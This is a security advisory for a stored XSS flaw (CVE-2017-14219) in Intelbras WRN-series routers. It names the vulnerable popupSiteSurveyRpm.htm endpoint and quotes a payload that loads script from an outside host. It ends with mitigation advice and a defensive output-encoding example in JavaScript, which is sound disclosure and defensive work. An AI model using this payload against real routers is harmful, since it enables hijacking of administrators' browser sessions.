Vendor: Intelbras Wireless N 150Mbps
By: Elber Tavares
CVSS: 6.1 (MEDIUM)
Type: XSS
CWE: 79
Product Name: Intelbras Wireless N 150Mbps
Affected Version From: Intelbras Wireless N 150Mbps - WRN 240
Affected Version To: Not specified
Patch Exists: NO
Related CVE: CVE-2017-14219
CPE: h:intelbras:intelbras_wireless_n_150mbps:wrn_240
Platforms Tested: Kali Linux, Windows 7, 8.1, 10
2017
Persistent XSS on Intelbras router with firmware WRN 250
This exploit achieves persistent (stored) XSS on Intelbras routers with firmware WRN 250. The malicious script is injected through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. The exploit requires a PHP script to retrieve the logs.
Mitigation:
To mitigate this vulnerability, it is recommended to update the firmware of the Intelbras router to a version that includes a fix for this issue. Additionally, network administrators can implement input validation and output encoding to prevent XSS attacks.
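The output encoding recommended above, shown as an added example that is not code from the advisory or from the Intelbras firmware. It assumes the stored value is written into an inline script block, which the payload's leading </script> suggests; renderEntries and the entries variable are hypothetical names.

```javascript
// Added example: context-aware output encoding for a value written into an
// inline <script> block. Assumption: the stored value is rendered inside
// <script>...</script>, as the payload's leading </script> suggests.

// Characters that can end the script block or a JS string when emitted raw.
const UNSAFE = /[<>&'\u2028\u2029]/g;

// Encode an untrusted string as a JS string literal that is safe inside <script>.
function encodeForInlineScript(value) {
  // JSON.stringify escapes double quotes, backslashes and control characters.
  const literal = JSON.stringify(String(value));
  // The HTML parser closes the block at a literal "</script", so every
  // HTML-significant character is emitted as a \uXXXX escape instead.
  return literal.replace(UNSAFE, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Render a hypothetical page fragment that lists stored entries.
function renderEntries(entries) {
  const items = entries.map(encodeForInlineScript).join(",\n  ");
  return "<script>\nvar entries = [\n  " + items + "\n];\n</script>";
}

// Defender check: count the script blocks the HTML parser would open.
function countScriptOpenTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed sample input: one benign entry and the payload quoted on this page.
const SAMPLE = ["HomeNetwork", "</script><script src='//elb.me'>"];
const page = renderEntries(SAMPLE);
console.log(page);
console.log("script blocks opened:", countScriptOpenTags(page));
```

The encoded literal still evaluates to the original string in JavaScript, so the stored value is displayed intact while the HTML parser never sees a closing or opening script tag inside it.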